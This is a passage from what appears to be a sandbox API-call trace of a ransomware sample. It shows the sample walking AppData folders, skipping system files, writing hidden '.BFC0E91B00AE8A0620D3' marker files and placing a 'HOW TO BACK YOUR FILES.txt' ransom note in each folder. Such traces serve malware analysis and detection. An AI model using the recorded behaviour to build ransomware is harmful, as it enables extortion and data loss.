RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91610 | out: ListHead=0xc66828, ListEntry=0xc91610) returned 0xc914b0 [0051.877] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed4f486b, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xed4f486b, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0xed4f486b, ftLastWriteTime.dwHighDateTime=0x1d327b5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UProof", cAlternateFileName="")) returned 1 [0051.877] lstrcmpiW (lpString1="UProof", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.877] lstrcmpiW (lpString1="UProof", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.877] lstrcmpiW (lpString1="UProof", lpString2="Tiger4444.exe") returned 1 [0051.877] lstrcmpiW (lpString1="UProof", lpString2=".") returned 1 [0051.877] lstrcmpiW (lpString1="UProof", lpString2="..") returned 1 [0051.877] lstrcmpiW (lpString1="UProof", lpString2="windows") returned -1 [0051.877] lstrcmpiW (lpString1="UProof", lpString2="bootmgr") returned 1 [0051.877] lstrcmpiW (lpString1="UProof", lpString2="pagefile.sys") returned 1 [0051.877] lstrcmpiW (lpString1="UProof", lpString2="boot") returned 1 [0051.877] lstrcmpiW (lpString1="UProof", lpString2="ids.txt") returned 1 [0051.877] lstrcmpiW (lpString1="UProof", lpString2="NTUSER.DAT") returned 1 [0051.877] lstrcpyW (in: lpString1=0x30aeafc, lpString2="UProof" | out: lpString1="UProof") returned="UProof" [0051.877] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc915c8 [0051.877] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x62) returned 0xc61e68 [0051.877] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc915d0 | out: ListHead=0xc66828, ListEntry=0xc915d0) returned 0xc91610 [0051.877] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfaff70b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3bb556b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xbfaff70b, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1 [0051.878] lstrcmpiW (lpString1="Vault", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.878] lstrcmpiW (lpString1="Vault", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.878] lstrcmpiW (lpString1="Vault", lpString2="Tiger4444.exe") returned 1 [0051.878] lstrcmpiW (lpString1="Vault", lpString2=".") returned 1 [0051.878] lstrcmpiW (lpString1="Vault", lpString2="..") returned 1 [0051.878] lstrcmpiW (lpString1="Vault", lpString2="windows") returned -1 [0051.878] lstrcmpiW (lpString1="Vault", lpString2="bootmgr") returned 1 [0051.878] lstrcmpiW (lpString1="Vault", lpString2="pagefile.sys") returned 1 [0051.878] lstrcmpiW (lpString1="Vault", lpString2="boot") returned 1 [0051.878] lstrcmpiW (lpString1="Vault", lpString2="ids.txt") returned 1 [0051.878] lstrcmpiW (lpString1="Vault", lpString2="NTUSER.DAT") returned 1 [0051.878] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Vault" | out: lpString1="Vault") returned="Vault" [0051.878] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91448 [0051.878] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x60) returned 0xc8d0f8 [0051.878] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91450 | out: ListHead=0xc66828, ListEntry=0xc91450) returned 0xc915d0 [0051.878] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xd65f9933, ftLastAccessTime.dwHighDateTime=0x1d327c2, ftLastWriteTime.dwLowDateTime=0xd65f9933, ftLastWriteTime.dwHighDateTime=0x1d327c2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0051.878] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.878] lstrcmpiW (lpString1="Windows", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.878] lstrcmpiW (lpString1="Windows", lpString2="Tiger4444.exe") returned 1 [0051.878] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0051.878] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0051.878] lstrcmpiW (lpString1="Windows", lpString2="windows") returned 0 [0051.878] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x300a046, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0051.878] lstrcmpiW (lpString1="Word", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.878] lstrcmpiW (lpString1="Word", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.878] lstrcmpiW (lpString1="Word", lpString2="Tiger4444.exe") returned 1 [0051.878] lstrcmpiW (lpString1="Word", lpString2=".") returned 1 [0051.878] lstrcmpiW (lpString1="Word", lpString2="..") returned 1 [0051.878] lstrcmpiW (lpString1="Word", lpString2="windows") returned 1 [0051.878] lstrcmpiW (lpString1="Word", lpString2="bootmgr") returned 1 [0051.878] lstrcmpiW (lpString1="Word", lpString2="pagefile.sys") returned 1 [0051.878] lstrcmpiW (lpString1="Word", lpString2="boot") returned 1 [0051.878] lstrcmpiW (lpString1="Word", lpString2="ids.txt") returned 1 [0051.878] lstrcmpiW (lpString1="Word", lpString2="NTUSER.DAT") returned 1 [0051.878] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Word" | out: lpString1="Word") returned="Word" [0051.878] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc915e8 [0051.878] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x5e) returned 0xc8d160 [0051.878] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc915f0 | out: ListHead=0xc66828, ListEntry=0xc915f0) returned 0xc91450 [0051.878] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x300a046, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 0 [0051.878] FindClose (in: hFindFile=0xc72e48 | out: hFindFile=0xc72e48) returned 1 [0051.879] lstrcpyW (in: lpString1=0x30aeafc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.879] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.879] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0051.879] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.879] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.880] CloseHandle (hObject=0x2c8) returned 1 [0051.880] CloseHandle (hObject=0x2ac) returned 1 [0051.880] GetCurrentThreadId () returned 0xfa8 [0051.880] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc915f0 [0051.880] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word" [0051.880] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d160 | out: hHeap=0xc50000) returned 1 [0051.880] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc915e8 | out: hHeap=0xc50000) returned 1 [0051.880] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word" [0051.880] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\" [0051.880] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\.BFC0E91B00AE8A0620D3" [0051.880] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\word\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.931] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.934] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.934] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.935] CloseHandle (hObject=0x2ac) returned 1 [0051.935] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word") returned 46 [0051.935] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.935] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x83f99c22, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0051.935] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.935] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.935] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.935] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.935] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x83f99c22, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.936] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.936] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.936] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.936] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.936] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.936] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83f99c22, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83f99c22, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83f99c22, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.936] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.936] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.936] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x300a046, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="STARTUP", cAlternateFileName="")) returned 1 [0051.936] lstrcmpiW (lpString1="STARTUP", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.936] lstrcmpiW (lpString1="STARTUP", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.936] lstrcmpiW (lpString1="STARTUP", lpString2="Tiger4444.exe") returned -1 [0051.936] lstrcmpiW (lpString1="STARTUP", lpString2=".") returned 1 [0051.936] lstrcmpiW (lpString1="STARTUP", lpString2="..") returned 1 [0051.936] lstrcmpiW (lpString1="STARTUP", lpString2="windows") returned -1 [0051.936] lstrcmpiW (lpString1="STARTUP", lpString2="bootmgr") returned 1 [0051.936] lstrcmpiW (lpString1="STARTUP", lpString2="pagefile.sys") returned 1 [0051.936] lstrcmpiW (lpString1="STARTUP", lpString2="boot") returned 1 [0051.936] lstrcmpiW (lpString1="STARTUP", lpString2="ids.txt") returned 1 [0051.936] lstrcmpiW (lpString1="STARTUP", lpString2="NTUSER.DAT") returned 1 [0051.936] lstrcpyW (in: lpString1=0x30aeb06, lpString2="STARTUP" | out: lpString1="STARTUP") returned="STARTUP" [0051.936] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91588 [0051.936] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6e) returned 0xc89680 [0051.936] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91590 | out: ListHead=0xc66828, ListEntry=0xc91590) returned 0xc91450 [0051.936] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x300a046, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="STARTUP", cAlternateFileName="")) returned 0 [0051.936] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0051.936] lstrcpyW (in: lpString1=0x30aeb06, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.936] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\word\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.937] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0051.937] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.937] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.937] CloseHandle (hObject=0x2c8) returned 1 [0051.937] CloseHandle (hObject=0x2ac) returned 1 [0051.937] GetCurrentThreadId () returned 0xfa8 [0051.937] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91590 [0051.937] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" [0051.937] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0051.937] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91588 | out: hHeap=0xc50000) returned 1 [0051.937] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" [0051.937] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\" [0051.937] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\.BFC0E91B00AE8A0620D3" [0051.938] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\word\\startup\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.939] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.942] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.943] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.943] CloseHandle (hObject=0x2ac) returned 1 [0051.943] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned 54 [0051.943] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.943] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x83f99c22, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0051.944] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.944] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.944] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.944] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.944] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x83f99c22, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.944] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.944] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.944] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.944] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.944] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.944] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83f99c22, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83f99c22, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83f99c22, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.944] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.944] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.944] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83f99c22, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83f99c22, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83f99c22, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0051.944] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0051.944] lstrcpyW (in: lpString1=0x30aeb16, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.944] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\word\\startup\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.944] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0051.944] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.945] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.945] CloseHandle (hObject=0x2c8) returned 1 [0051.945] CloseHandle (hObject=0x2ac) returned 1 [0051.945] GetCurrentThreadId () returned 0xfa8 [0051.945] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91450 [0051.945] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault" [0051.945] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0051.945] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91448 | out: hHeap=0xc50000) returned 1 [0051.945] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault" [0051.945] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\" [0051.945] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\.BFC0E91B00AE8A0620D3" [0051.945] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Vault\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\vault\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 